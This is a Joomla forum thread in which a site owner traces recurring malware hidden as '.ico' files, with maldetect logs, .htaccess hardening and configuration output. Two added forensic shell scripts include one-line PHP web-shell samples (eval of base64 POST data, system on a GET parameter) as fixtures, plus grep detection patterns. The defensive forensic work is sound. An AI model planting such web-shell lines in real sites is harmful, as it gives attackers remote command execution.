Malware detected in scans

Discussion regarding Joomla! 3.x security issues.

stuffdone
Joomla! Guru
Posts: 728
Joined: Tue Oct 28, 2008 11:06 pm
Location: NE Florida

Malware detected in scans

Post by stuffdone » Tue Dec 29, 2020 10:25 pm

I have a site that keeps tripping malware scans. I cannot figure out how this infection is taking place.

Nothing so far seems to have had any negative effect on the site that I can see at the moment.

Joomla and all extensions are up to date and using PHP7.4

I found a "gif" image that was actually code which was removed.

In the default image directory I keep a .htaccess file to prevent scripts from running from that directory. I also use .htaccess to prevent access to the /administrator directory. I disable it when I need to administer content.


{HEX}php.inject.miner2a2.484 : /home/yourpriv/public_html/plugins/content/finder/.73865c3c.ico => /usr/local/maldetect/quarantine/.73865c3c.ico.1831021480
{HEX}php.inject.miner2a2.484 : /home/yourpriv/public_html/media/com_fields/js/.432e1bdf.ico => /usr/local/maldetect/quarantine/.432e1bdf.ico.986211269
{HEX}php.inject.miner2a2.484 : /home/yourpriv/public_html/libraries/src/Image/.7065e556.ico => /usr/local/maldetect/quarantine/.7065e556.ico.216614783
{HEX}php.inject.miner2a2.484 : /home/yourpriv/public_html/plugins/extension/jce/.3b88361f.ico => /usr/local/maldetect/quarantine/.3b88361f.ico.2798422822
{HEX}php.inject.miner2a2.484 : /home/yourpriv/public_html/plugins/system/redirect/.9965bd08.ico => /usr/local/maldetect/quarantine/.9965bd08.ico.2055128234
{HEX}php.inject.miner2a2.484 : /home/yourpriv/public_html/components/com_tags/models/.da5bf91c.ico => /usr/local/maldetect/quarantine/.da5bf91c.ico.63442032

Last edited by toivo on Wed Dec 30, 2020 4:47 am, edited 1 time in total.
Reason: mod note: retitled - all CAPS subject not allowed, observe the forum rules at https://forum.joomla.org/viewtopic.php?f=8&t=65
--- http://www.Stuffdone.com ---
Wow. Doing web sites for over 28+ years now. Still learn new tricks...not bad for an old dog

abernyte
Joomla! Virtuoso
Posts: 4189
Joined: Fri May 15, 2009 2:01 pm
Location: Écosse - Scozia - Escocia - Škotija -स्कॉटलैंड

Re: Malware detected in scans

Post by abernyte » Wed Dec 30, 2020 11:39 am

If your question is: "how do I clean my site which I know is infected" then the answer is viewtopic.php?f=714&t=946026
If you are saying that you have restored the site to clean and it keeps getting re-infected then how did you deal with the original hack?
"Those who expect to reap the blessings of freedom must, like men, undergo the fatigue of supporting it." Thomas Paine


Re: Malware detected in scans

Post by stuffdone » Wed Dec 30, 2020 3:30 pm

I have malware scans that run so when something like this appears I know it and know where the quarantined files were. But the downside is that there is no indication as to how the files were placed in order to patch. This is one of a number of sites I have on server and only this one seems to have a problem. All updates are current.

It is a pretty basic site with very few extensions beyond the defaults in Joomla. I am even using Beez ( cloned so not overwritten by updates )

My question is not about how to clean the site but how to determine the source of the infection. How are they getting in?

If that can be determined I can plug the hole and send info to developer to check for weakness in their code.

A clean install is not a good solution, not because of the CMS or extensions but because of the content.

The extensions I do use are:
  • JCE Editor
  • Mega Menu
  • OSMap
  • Jumi
I know that editors are often a source because of their file upload capabilities. I may try removing and stick to the default editor. ( I just like JCE and no problems on any other sites )
--- http://www.Stuffdone.com ---
Wow. Doing web sites for over 28+ years now. Still learn new tricks...not bad for an old dog

Webdongle
Joomla! Master
Posts: 44071
Joined: Sat Apr 05, 2008 9:58 pm

Re: Malware detected in scans

Post by Webdongle » Wed Dec 30, 2020 4:29 pm

stuffdone wrote:
Wed Dec 30, 2020 3:30 pm
My question is not about how to clean the site but how to determine the source of the infection.
If you knew what question to ask then you would know what the problem is.

viewtopic.php?f=714&t=946026 is the answer to your problem. If you read it then you will see it doesn't affect the data in your database.

The cause of the hack could have been months ago. There have probably been many hack files on your server that the scans have not recognised.

Your PC could have been compromised and putting hacks on the server.
You could have download compromised images or files.
You may have edited user groups incorrectly.
You may have edited JCE`s options and allowed registered users to edit with higher Privileges.

There are far more possibilities than vulnerable extensions. Cherry-picking only files that you find is not the answer. Following viewtopic.php?f=714&t=946026 or hiring a professional are your only viable options.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".


Re: Malware detected in scans

Post by stuffdone » Wed Dec 30, 2020 5:42 pm

Not particularly helpful but I do appreciate all efforts here.

Simply listing a bunch of "possibles" does nothing to help narrow it down. I know all the "possibles".

How do I know WHICH is allowing the hacker access. Shotgun approach does not permit me to ID the actual problem or to know what developer to notify if their extension has the vulnerability.

I know I can just re-install everything but that still will not ID the source. Fixing the immediate infection is only the easy part.

Identifying it is the tricky part. If I just replace everything I have destroyed the evidence I might need to prevent the same problem in the future or to possibly share the hole with others.

Thanks.

sozzled
I've been banned!
Posts: 13639
Joined: Sun Jul 05, 2009 3:30 am
Location: Canberra, Australia

Re: Malware detected in scans

Post by sozzled » Wed Dec 30, 2020 5:51 pm

Let's play guess-what's-the-problem.

Is this the website that was running an outdated version of J! two years ago, that was never properly fixed, using software that's incompatible with PHP 7? I remember the problem with that website (the session data was filling up, consuming all available disk space) that used Jumi.

I agree with @Webdongle, that cherry-picking is not a solution. While the OP mentions four extensions—JCE Editor, Mega Menu, OSMap, Jumi—and using a cloned version of one of the Beez templates (who knows when that version was created) and suggests that it's a "pretty basic" website, there's always more to the story, isn't there?

So, while we can dance around with blindfolds and guess the source of the problem, it's as clear as daylight what's the problem, isn't it? And it's not our problem that we're unable to assist further.

Now, I've had these kinds of problems before (where some kind of malware took down several J! websites) a few years ago. I knew what the problem was and what caused it; it was my own neglect. I also knew the solution: starting over. It took me a couple of weeks but I prevailed and I haven't had these problems since. So, when someone writes, "A clean install is not a good solution not because of the CMS or extensions but because of the content", they're just making excuses and they're not taking things seriously. There's a difference between an efficient solution, a good solution and an effective solution. Sure, an efficient solution is to restore the website from its previous backup. If you've only got enough hours in the day to spend restoring websites from backups then that's a good solution. If you want to spend your time doing other things then it's not an effective solution ... but it's not my time or my problem, is it?

I think, in the end, the question boils down to whether the website can be restored to health by applying band-aids (patches) or with surgery (re-doing the website). It's not my patient, thankfully.


Re: Malware detected in scans

Post by Webdongle » Thu Dec 31, 2020 9:25 am

@stuffdone
Listing a few of the possible causes is the whole point. It shows how futile your efforts (to cherry pick) are.

Your only realistic options are follow the guidance or hire a professional E.O.F.


Re: Malware detected in scans

Post by stuffdone » Sun Jan 03, 2021 5:56 pm

Ok. Back to start.

I am not doing a clean install for only one reason now. This is NOT a paying customer and it is my desire to determine cause and effect. I have other similar sites and would like to know what the underlying holes are in this one so I can take a pro-active approach to others now and in future.

Simply "fixing" this so it works does nothing to help me understand the nature of this infection.

PLEASE. While I do appreciate all the good intentions of others telling me how to start over to fix this site (I know full well how to do that), doing so will erase the evidence of the infection.

What I am trying to elicit is help to understand THIS INFECTION so I know what solutions can then be applied to future.

I think I did state at least once that EVERY extension and Joomla are current and up to date as are all of my sites. As soon as an update is out I apply it.

The clone of BEEZ is done within Joomla admin through the template manager. Unless Joomla is inserting something that does not belong there, it should be identical to the default beez template. I do that so I can tweak some CSS etc. and not have an update overwrite it.

The locations I am finding malware hiding as image files are:

/coalawebtraffic ( cleaned and reinstalled )
/ajax
/tags
/search
/finder
/osmap

I know this does not necessarily indicate those extensions/functions as the actual culprit, just the targets.


This whole post is about detective work NOT about restoring the site which I can do. I have all articles exported for that purpose when the time is ripe.

Thanks, and I really do appreciate responses but please understand this is a journey to understand the intrusion path NOT how to restore the site.


toivo
Joomla! Master
Posts: 17426
Joined: Thu Feb 15, 2007 5:48 am
Location: Sydney, Australia

Re: Malware detected in scans

Post by toivo » Sun Jan 03, 2021 6:36 pm

stuffdone wrote:
Sun Jan 03, 2021 5:56 pm
The locations I am finding malware hiding as image files are: I know this does not necessarily indicate those extensions/functions as the actual culprit, just the targets.

/coalawebtraffic ( cleaned and reinstalled )
/ajax
/tags
/search
/finder
/osmap
Does the format /folder-name mean that those folders are at the top level in the main Joomla folder? Those folders shouldn't be there at all.

Please post the results from the Forum Post Assistant (FPA) so that the configuration can be reviewed. The link is in the red banner at the top.
Toivo Talikka, Global Moderator


Re: Malware detected in scans

Post by Webdongle » Sun Jan 03, 2021 6:39 pm

stuffdone wrote:
Sun Jan 03, 2021 5:56 pm
... This is NOT a paying customer and it is my desire to determine cause and effect. ...
You could check all access logs for at least the last 4 months. If you have the time to do that to identify uploaded hack files then go ahead and do it. But if the cause was a badly configured editor/acl then it probably won't show in the access logs.

Most likely cause is your lack of updating software fast enough. But like I pointed out earlier, there are so many possibilities it is impractical (and probably impossible) to locate the actual cause.

Bottom line
Trying to find the exact cause is like 'chasing rainbows'


Re: Malware detected in scans

Post by stuffdone » Tue Jan 05, 2021 3:33 pm

UPDATE:

I wiped everything and did a clean install. Deleted the old DB and started new. Nothing of the original installation remained. Then the same afternoon a scan found a malware .ico file already.

/modules/mod_tags_popular/.93fbb305.ico ( It was immediately sent to quarantine tho )

( I do have line in htaccess to prevent accessing any .ico file via web but that won't stop a script being run on server accessing )

Tags seem to be a recurring theme here. I disabled them in admin. I never use them anyway. What if I were to delete their directories from the server?

Prior targets seem to have been /search which I also don't use on the front end at all.

The only extensions I reinstalled from new downloads are:
  • Akeeba
  • oSMap
  • Jumi ( which I can live without and will remove )
Using the default Protostar template

All passwords were changed including FTP.

Different email in admin account.

--
This would seem to indicate there is a security hole in Joomla given everything was totally removed and reinstalled from fresh downloads from Joomla extensions directory.
--
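Webdongle's suggestion to go through the access logs is the one concrete lead in this thread, and the reinstall-then-reinfected sequence in the post above gives exactly the thing that makes it tractable: a narrow time window (the afternoon of the clean install) in which the writer of /modules/mod_tags_popular/.93fbb305.ico must have acted, if it acted over HTTP at all. What follows is an added example written for this page, not code from the thread, from Joomla or from maldetect. It is a shell/awk filter that reads an Apache combined-format access log on stdin and prints, for a given window, every POST, every request that names a dotfile, and every .ico request other than /favicon.ico. The lines in SAMPLE_LOG are constructed for the demo (documentation IP ranges, an invented component name com_example); the combined log format and the per-domain raw logs under ~/access-logs/ are assumptions about a typical cPanel host.

```shell
#!/bin/sh
# Added example: narrow an Apache "combined" access log to the requests worth a second
# look inside a time window (e.g. around the mtime of a quarantined file).
# The log lines below are constructed for the demo and are not from the thread.

SAMPLE_LOG=$(cat <<'EOF'
203.0.113.5 - - [05/Jan/2021:13:58:02 +0000] "GET /index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Jan/2021:14:01:47 +0000] "POST /index.php?option=com_example&task=upload HTTP/1.1" 200 312 "-" "python-requests/2.25.1"
198.51.100.9 - - [05/Jan/2021:14:02:11 +0000] "GET /modules/mod_tags_popular/.93fbb305.ico HTTP/1.1" 200 1402 "-" "python-requests/2.25.1"
203.0.113.5 - - [05/Jan/2021:14:05:30 +0000] "GET /images/logo.png HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.9 - - [05/Jan/2021:16:40:00 +0000] "POST /temp/index.php HTTP/1.1" 200 77 "-" "curl/7.64.0"
EOF
)

# to_key "2021-01-05 14:00:00" -> 20210105140000 (a sortable digit string)
to_key() { printf '%s' "$1" | tr -dc '0-9'; }

# suspect_requests START END   (reads the access log on stdin)
# Prints reason, client IP, timestamp, method and path for every request inside
# [START, END] that is a POST, names a dotfile, or fetches an .ico other than /favicon.ico.
suspect_requests() {
  awk -v start="$(to_key "$1")" -v end="$(to_key "$2")" '
  BEGIN {
    split("Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec", m, " ")
    for (i = 1; i <= 12; i++) mon[m[i]] = sprintf("%02d", i)
  }
  {
    ts = $4; sub(/^\[/, "", ts)                  # 05/Jan/2021:14:02:11
    n = split(ts, p, "[/:]")                     # p: dd Mon yyyy HH MM SS
    if (n != 6) next
    key = p[3] mon[p[2]] p[1] p[4] p[5] p[6]     # yyyymmddHHMMSS
    if (key < start || key > end) next
    method = $6; sub(/^"/, "", method)
    path = $7; sub(/\?.*/, "", path)             # drop the query string
    reason = ""
    if (method == "POST")                                reason = "POST"
    else if (path ~ "/\\.[^/]+$")                        reason = "dotfile"
    else if (path ~ "\\.ico$" && path != "/favicon.ico") reason = "ico"
    if (reason != "") print reason "\t" $1 "\t" ts "\t" method " " path
  }'
}

# Demo: the half hour in which the constructed log shows an upload POST followed by a
# fetch of a freshly created dotfile. The later POST at 16:40 is outside the window.
printf '%s\n' "$SAMPLE_LOG" | suspect_requests "2021-01-05 14:00:00" "2021-01-05 14:30:00"
```

On a cPanel host this is typically `zcat ~/access-logs/example.com*.gz | suspect_requests "..." "..."` (plain `cat` for the current log), with the window set an hour or so before the scan that quarantined the file. A POST to a component the site does not use, followed within seconds by a 200 for a brand-new dotfile, is the pattern that identifies both the entry point and the file it dropped; if the window shows nothing at all, the file was not written by a web request, which moves the suspicion to FTP, cron, or a script already on the server.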


Re: Malware detected in scans

Post by stuffdone » Tue Jan 05, 2021 3:38 pm

QUESTION for those more familiar with htaccess files.

Is there a method to prevent the uploading of ANY .ico file that is not specifically named favicon.ico? That seems to be the favorite method of infection, fake .ico files.


Re: Malware detected in scans

Post by stuffdone » Tue Jan 05, 2021 3:41 pm

Further examination: the /temp directory had the .html file replaced with a .php file that appears to be malware, so they are accessing /temp. I can block that with .htaccess if they are doing so via http, but not if via a script or ftp.

More to come....


Re: Malware detected in scans

Post by stuffdone » Tue Jan 05, 2021 3:46 pm

Added htaccess to /temp ( Yes I also renamed from /tmp )

# Deny web access to this .htaccess file itself
<Files .htaccess>
order allow,deny
deny from all
</Files>

# No directory listings and no CGI execution in this directory
Options -Indexes
Options -ExecCGI
# With ExecCGI off, mapping these extensions to the CGI handler makes Apache answer
# requests for them with 403 rather than executing or serving them. Verify with a
# harmless test file: on PHP-FPM hosts a server-level SetHandler for .php can take
# precedence over this directory rule.
AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .shtml .sh .cgi .ico .jpg .png

## No directory listings (IfModule needs the module file name, mod_autoindex.c, to match)
<IfModule mod_autoindex.c>
IndexIgnore *
</IfModule>

## Suppress mime type detection in browsers for unknown types
<IfModule mod_headers.c>
Header always set X-Content-Type-Options "nosniff"
</IfModule>
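On the .htaccess question asked a few posts up: Apache only decides how it serves files that are already on disk, so no .htaccess rule can stop a PHP process, an FTP session or a cron job from writing a new .ico. What the directory rules above can do is refuse to execute or serve such files, and even that is worth confirming with a harmless test file on a PHP-FPM host. The detective work therefore has to happen on disk, and it has to see hidden files, which some file managers skip (one reason a "wipe everything" can leave a dotfile behind). The following is an added example written for this page, not code from the thread, from Joomla or from maldetect: three small shell functions that find files which are PHP no matter what their name says, list dotfiles other than the ones Apache legitimately uses, and list recently modified files to pick a window for the access-log search. make_sample_tree builds a constructed toy webroot; every file name and content in it is invented for the demo.

```shell
#!/bin/sh
# Added example: hunt for PHP hiding behind image names, as the quarantine lines in this
# thread show, and list hidden files that a GUI file manager may not display.
# The sample webroot below is constructed for the demo; nothing in it is from the thread.

# make_sample_tree DIR: a toy webroot with one real favicon, one real GIF, one legitimate
# PHP file, one hidden ".ico" that is really PHP, and one non-hidden ".gif" that is really PHP.
make_sample_tree() {
  mkdir -p "$1/modules/mod_demo" "$1/images" "$1/temp"
  printf '\000\000\001\000fake-icon-bytes' > "$1/favicon.ico"
  printf 'GIF89a\001\000\001\000' > "$1/images/logo.gif"
  printf '<?php\necho "legit";\n' > "$1/index.php"
  printf 'Options -Indexes\n' > "$1/images/.htaccess"
  printf '<?php eval(base64_decode($_POST["x"]));' > "$1/modules/mod_demo/.a1b2c3d4.ico"
  printf 'GIF89a<?php system($_GET["c"]);' > "$1/temp/cache.gif"
}

# hunt_php_in_non_php ROOT: regular files not named *.php/*.phtml whose contents carry a
# PHP open tag or an eval( call. grep -a treats binary files as text so a GIF header in
# front of the PHP does not hide it; -l prints only the file name.
hunt_php_in_non_php() {
  find "$1" -type f ! -name '*.php' ! -name '*.phtml' \
    -exec grep -laF -e '<?php' -e 'eval(' {} + 2>/dev/null | sort
}

# hunt_hidden_files ROOT: dotfiles other than the ones Apache and packaging normally use.
hunt_hidden_files() {
  find "$1" -type f -name '.*' ! -name '.htaccess' ! -name '.htpasswd' ! -name '.gitignore' | sort
}

# recent_files ROOT MINUTES: anything modified in the last MINUTES, to bound the window
# that is then searched in the access logs.
recent_files() {
  find "$1" -type f -mmin "-$2" | sort
}

# Demo against the constructed tree.
demo_root=$(mktemp -d)
make_sample_tree "$demo_root"
echo "== PHP hiding behind non-PHP names =="
hunt_php_in_non_php "$demo_root"
echo "== hidden files =="
hunt_hidden_files "$demo_root"
rm -rf "$demo_root"
```

Against a real site, `hunt_php_in_non_php /home/<user>/public_html` will also list legitimate oddities (template files with other extensions, vendored assets), so read the hits rather than deleting them blindly; the combination of a hit list from these functions, the mtimes of the files on it, and the matching window of the access log is what a host's support team can act on, and it survives a reinstall only if you record it before wiping.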


Re: Malware detected in scans

Post by toivo » Tue Jan 05, 2021 3:57 pm

stuffdone wrote:
Tue Jan 05, 2021 3:33 pm
This would seem to indicate there is a security hole in Joomla given everything was totally removed and reinstalled from fresh downloads from Joomla extensions directory.
If that were the case, this 3.x Security forum would be flooded with similar reports. How secure is your web server?

Please post the results from the Forum Post Assistant (FPA) by following the instructions at https://forumpostassistant.github.io/docs so that our volunteer experts can review the configuration.


Re: Malware detected in scans

Post by stuffdone » Tue Jan 05, 2021 4:21 pm

toivo wrote:
Tue Jan 05, 2021 3:57 pm
How secure is your web server?
I assume it is pretty good and host provides malware scans etc. I have multiple sites and only this one domain seems to be under assault.


Re: Malware detected in scans

Post by stuffdone » Tue Jan 05, 2021 4:27 pm

Tried the FPA but it keeps deleting itself.

As a security measure, this copy of FPA has been self-deleted due to the time it has been present on the server.


Re: Malware detected in scans

Post by stuffdone » Tue Jan 05, 2021 5:25 pm

FPA output.

I had to comment out a line in FPA to stop it from self destruction but got an output posted here.

Forum Post Assistant (v1.6.2) : 5-Jan-2021
Last PHP Error(s) Reported :: [05-Jan-2021 00:22:19 UTC] PHP Warning: session_write_close(): Failed to write session data using user defined save handler. (session.save_path: /var/cpanel/php/sessions/ea-php72) in /home/yourpriv/public_html/libraries/joomla/session/handler/native.php on line 194
Basic Environment ::
Joomla! Instance :: Joomla! 3.9.23-Stable (Amani) 24-November-2020
Joomla! Platform :: Joomla Platform 13.1.0-Stable (Curiosity) 24-Apr-2013
Joomla! Configured :: Yes | Read-Only (444) |
Configuration Options :: Offline: false | SEF: true | SEF Suffix: false | SEF ReWrite: false | .htaccess/web.config: Yes | GZip: false | Cache: false | CacheTime: 15 | CacheHandler: file | CachePlatformPrefix: false | FTP Layer: false | Proxy: false | LiveSite: | Session lifetime: 15 | Session handler: database | Shared sessions: false | SSL: 0 | Error Reporting: default | Site Debug: false | Language Debug: false | Default Access: 1 | Unicode Slugs: false | dbConnection Type: mysqli | PHP Supports J! 3.9.23: Yes | Database Supports J! 3.9.23: Yes | Database Credentials Present: Yes |

Host Configuration :: OS: Linux | OS Version: 2.6.32-754.6.3.el6.x86_64 | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate, br | System TMP Writable: Yes | Free Disk Space : 33.42 GiB |

PHP Configuration :: Version: 7.4.13 | PHP API: fpm-fcgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 32759 | Log Errors To: /home/yourpriv/logs/4yourprivacy_com.php.error.log | Last Known Error: 05th January 2021 00:22:19. | Register Globals: | Magic Quotes: | Safe Mode: | Allow url fopen: 1 | Open Base: | Uploads: 1 | Max. Upload Size: 20M | Max. POST Size: 20M | Max. Input Time: 60 | Max. Execution Time: 60 | Memory Limit: 32M

Database Configuration :: Version: 5.5.5-10.3.27-MariaDB (Client:mysqlnd 7.4.13) | Database Size: 5.17 MiB | #of Tables with config prefix: 87 | #of other Tables: 0 | User Privileges : GRANT ALL
Detailed Environment ::
PHP Extensions :: Core (7.4.13) | date (7.4.13) | libxml (7.4.13) | openssl (7.4.13) | pcre (7.4.13) | zlib (7.4.13) | filter (7.4.13) | hash (7.4.13) | pcntl (7.4.13) | Reflection (7.4.13) | SPL (7.4.13) | session (7.4.13) | standard (7.4.13) | cgi-fcgi (7.4.13) | bcmath (7.4.13) | calendar (7.4.13) | ctype (7.4.13) | curl (7.4.13) | dom (20031129) | ftp (7.4.13) | gd (7.4.13) | iconv (7.4.13) | imap (7.4.13) | json (7.4.13) | mbstring (7.4.13) | mysqlnd (mysqlnd 7.4.13) | PDO (7.4.13) | Phar (7.4.13) | posix (7.4.13) | SimpleXML (7.4.13) | soap (7.4.13) | sockets (7.4.13) | tokenizer (7.4.13) | xml (7.4.13) | xmlwriter (7.4.13) | xsl (7.4.13) | zip (1.15.6) | mysqli (7.4.13) | pdo_mysql (7.4.13) | xmlreader (7.4.13) | Zend Engine (3.4.0) |
Potential Missing Extensions ::
Disabled Functions :: exec | passthru | shell_exec | system |

Switch User Environment :: PHP CGI: No | Server SU: No | PHP SU: No | Potential Ownership Issues: No
Folder Permissions ::
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (---) | tmp/ (---) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) | administrator/logs/ (755) |

Elevated Permissions (First 10) :: administrator/backup/ (775) |
Database Information ::
Database statistics :: Uptime: 60741 | Threads: 17 | Questions: 328067 | Slow queries: 325 | Opens: 21745 | Flush tables: 5 | Open tables: 2000 | Queries per second avg: 5.401 |
Extensions Discovered ::
Components :: Site ::
Core :: com_wrapper (3.0.0) 1 | com_mailto (3.0.0) 1 |
3rd Party:: WF_XHTMLXTRAS_TITLE (2.9.1) ? | WF_LAYER_TITLE (2.6.33) ? | WF_FULLSCREEN_TITLE (2.9.1) ? | WF_AUTOSAVE_TITLE (2.9.1) ? | WF_PREVIEW_TITLE (2.9.1) ? | WF_FORMATSELECT_TITLE (2.9.1) ? | WF_LINK_TITLE (2.9.1) ? | WF_VISUALCHARS_TITLE (2.9.1) ? | WF_TEXTCASE_TITLE (2.9.1) ? | WF_SPELLCHECKER_TITLE (2.9.1) ? | WF_WORDCOUNT_TITLE (2.9.1) ? | WF_TABLE_TITLE (2.9.1) ? | WF_ARTICLE_TITLE (2.9.1) ? | WF_BROWSER_TITLE (2.9.1) ? | WF_EMOTIONS_TITLE (2.9.1) ? | WF_CONTEXTMENU_TITLE (2.9.1) ? | WF_VISUALBLOCKS_TITLE (2.9.1) ? | WF_PRINT_TITLE (2.9.1) ? | WF_FONTCOLOR_TITLE (2.9.1) ? | WF_KITCHENSINK_TITLE (2.9.1) ? | WF_ANCHOR_TITLE (2.9.1) ? | WF_FONTSELECT_TITLE (2.9.1) ? | WF_SEARCHREPLACE_TITLE (2.9.1) ? | WF_HR_TITLE (2.9.1) ? | WF_LISTS_TITLE (2.9.1) ? | WF_DIRECTIONALITY_TITLE (2.9.1) ? | WF_STYLESELECT_TITLE (2.9.1) ? | WF_MEDIA_TITLE (2.9.1) ? | WF_CLIPBOARD_TITLE (2.9.1) ? | JCE - Noneditable (1.0.0) ? | WF_STYLE_TITLE (2.9.1) ? | WF_FONTSIZESELECT_TITLE (2.9.1) ? | WF_REFERENCE_TITLE (2.9.1) ? | WF_CHARMAP_TITLE (2.9.1) ? | WF_ATTRIBUTES_TITLE (2.9.1) ? | WF_HELP_TITLE (2.9.1) ? | WF_CLEANUP_TITLE (2.9.1) ? | WF_IMGMANAGER_TITLE (2.9.1) ? | WF_NONBREAKING_TITLE (2.9.1) ? | WF_INLINEPOPUPS_TITLE (2.6.33) ? | WF_SOURCE_TITLE (2.9.1) ? | WF_LINKS_JOOMLALINKS_TITLE (2.9.1) ? | WF_LINK_SEARCH_TITLE (2.9.1) ? | WF_POPUPS_JCEMEDIABOX_TITLE (2.9.1) ? | WF_POPUPS_WINDOW_TITLE (2.6.33) ? | WF_AGGREGATOR_DAILYMOTION_TITLE (2.9.1) ? | WF_AGGREGATOR_VIMEO_TITLE (2.9.1) ? | WF_AGGREGATOR_VIDEO_TITLE (2.9.1) ? | WF_AGGREGATOR_[youtube]_TITLE (2.9.1) ? | WF_AGGREGATOR_AUDIO_TITLE (2.9.1) ? | WF_AGGREGATOR_VINE_TITLE (2.6.33) ? | WF_FILESYSTEM_JOOMLA_TITLE (2.9.1) ? |

Components :: Admin ::
Core :: com_ajax (3.2.0) 1 | com_menus (3.0.0) 1 | com_admin (3.0.0) 1 | com_tags (3.1.0) 1 | com_joomlaupdate (3.6.2) 1 | com_newsfeeds (3.0.0) 1 | com_privacy (3.9.0) 1 | com_postinstall (3.2.0) 1 | com_messages (3.0.0) 1 | com_associations (3.7.0) 1 | com_contenthistory (3.2.0) 1 | com_login (3.0.0) 1 | com_redirect (3.0.0) 1 | com_cpanel (3.0.0) 1 | com_languages (3.0.0) 1 | com_modules (3.0.0) 1 | com_cache (3.0.0) 1 | com_config (3.0.0) 1 | com_categories (3.0.0) 1 | com_users (3.0.0) 1 | com_finder (3.0.0) 1 | com_checkin (3.0.0) 1 | com_media (3.0.0) 1 | com_fields (3.7.0) 1 | com_search (3.0.0) 1 | com_installer (3.0.0) 1 | com_content (3.0.0) 1 | com_plugins (3.0.0) 1 | com_templates (3.0.0) 1 | com_actionlogs (3.9.0) 1 | com_banners (3.0.0) 1 |
3rd Party:: COM_OSMAP (4.2.39) 1 | Akeeba (7.5.0.1) 1 | COM_JCE (2.9.1) 1 |

Modules :: Site ::
Core :: mod_login (3.0.0) 1 | mod_articles_news (3.0.0) 1 | mod_footer (3.0.0) 1 | mod_articles_archive (3.0.0) 1 | mod_articles_categories (3.0.0) 1 | mod_custom (3.0.0) 1 | mod_related_items (3.0.0) 1 | mod_whosonline (3.0.0) 1 | mod_search (3.0.0) 1 | mod_articles_latest (3.0.0) 1 | mod_wrapper (3.0.0) 1 | mod_random_image (3.0.0) 1 | mod_tags_similar (3.1.0) 1 | mod_feed (3.0.0) 1 | mod_breadcrumbs (3.0.0) 1 | mod_users_latest (3.0.0) 1 | mod_stats (3.0.0) 1 | mod_tags_popular (3.1.0) 1 | mod_banners (3.0.0) 1 | mod_languages (3.5.0) 1 | mod_syndicate (3.0.0) 1 | mod_finder (3.0.0) 1 | mod_menu (3.0.0) 1 | mod_articles_category (3.0.0) 1 | mod_articles_popular (3.0.0) 1 |
3rd Party::

Modules :: Admin ::
Core :: mod_title (3.0.0) 1 | mod_latest (3.0.0) 1 | mod_latestactions (3.9.0) 1 | mod_login (3.0.0) 1 | mod_multilangstatus (3.0.0) 1 | mod_popular (3.0.0) 1 | mod_privacy_dashboard (3.9.0) 1 | mod_custom (3.0.0) 1 | mod_quickicon (3.0.0) 1 | mod_logged (3.0.0) 1 | mod_status (3.0.0) 1 | mod_feed (3.0.0) 1 | mod_toolbar (3.0.0) 1 | mod_stats_admin (3.0.0) 1 | mod_version (3.0.0) 1 | mod_submenu (3.0.0) 1 | mod_sampledata (3.8.0) 1 | mod_menu (3.0.0) 1 |
3rd Party::

Libraries ::
Core ::
3rd Party:: file_fof30 (3.7.1) ? |

Plugins ::
Core :: plg_fields_color (3.7.0) 1 | plg_fields_radio (3.7.0) 1 | plg_fields_usergrouplist (3.7.0) 1 | plg_fields_text (3.7.0) 1 | plg_fields_imagelist (3.7.0) 1 | plg_fields_editor (3.7.0) 1 | plg_fields_url (3.7.0) 1 | plg_fields_textarea (3.7.0) 1 | plg_fields_repeatable (3.9.0) 1 | plg_fields_list (3.7.0) 1 | plg_fields_checkboxes (3.7.0) 1 | plg_fields_media (3.7.0) 1 | plg_fields_sql (3.7.0) 1 | plg_fields_calendar (3.7.0) 1 | plg_fields_user (3.7.0) 1 | plg_fields_integer (3.7.0) 1 | plg_quickicon_phpversioncheck (3.7.0) 1 | plg_quickicon_extensionupdate (3.0.0) 1 | plg_quickicon_joomlaupdate (3.0.0) 1 | plg_quickicon_privacycheck (3.9.0) 1 | PLG_ACTIONLOG_JOOMLA (3.9.0) 1 | plg_captcha_recaptcha (3.4.0) 0 | plg_captcha_recaptcha_invisible (3.8) 0 | plg_search_contacts (3.0.0) 1 | plg_search_newsfeeds (3.0.0) 1 | plg_search_categories (3.0.0) 1 | plg_search_content (3.0.0) 1 | plg_search_tags (3.0.0) 1 | plg_twofactorauth_yubikey (3.2.0) 0 | plg_twofactorauth_totp (3.2.0) 0 | PLG_INSTALLER_URLINSTALLER (3.6.0) 1 | plg_installer_packageinstaller (3.6.0) 1 | PLG_INSTALLER_FOLDERINSTALLER (3.6.0) 1 | plg_finder_contacts (3.0.0) 1 | plg_finder_newsfeeds (3.0.0) 1 | plg_finder_categories (3.0.0) 1 | plg_finder_content (3.0.0) 1 | plg_finder_tags (3.0.0) 1 | plg_system_cache (3.0.0) 0 | plg_system_privacyconsent (3.9.0) 0 | plg_system_fields (3.7.0) 1 | plg_system_updatenotification (3.5.0) 1 | plg_system_remember (3.0.0) 1 | plg_system_highlight (3.0.0) 1 | plg_system_sessiongc (3.8.6) 1 | plg_system_languagecode (3.0.0) 0 | plg_system_p3p (3.0.0) 0 | plg_system_stats (3.5.0) 1 | plg_system_redirect (3.0.0) 0 | plg_system_debug (3.0.0) 1 | PLG_SYSTEM_ACTIONLOGS (3.9.0) 1 | plg_system_logout (3.0.0) 1 | plg_system_logrotation (3.9.0) 1 | plg_system_log (3.0.0) 1 | plg_system_languagefilter (3.0.0) 0 | plg_system_sef (3.0.0) 1 | plg_content_fields (3.7.0) 1 | plg_content_loadmodule (3.0.0) 1 | plg_content_joomla (3.0.0) 1 | plg_content_pagenavigation (3.0.0) 1 | 
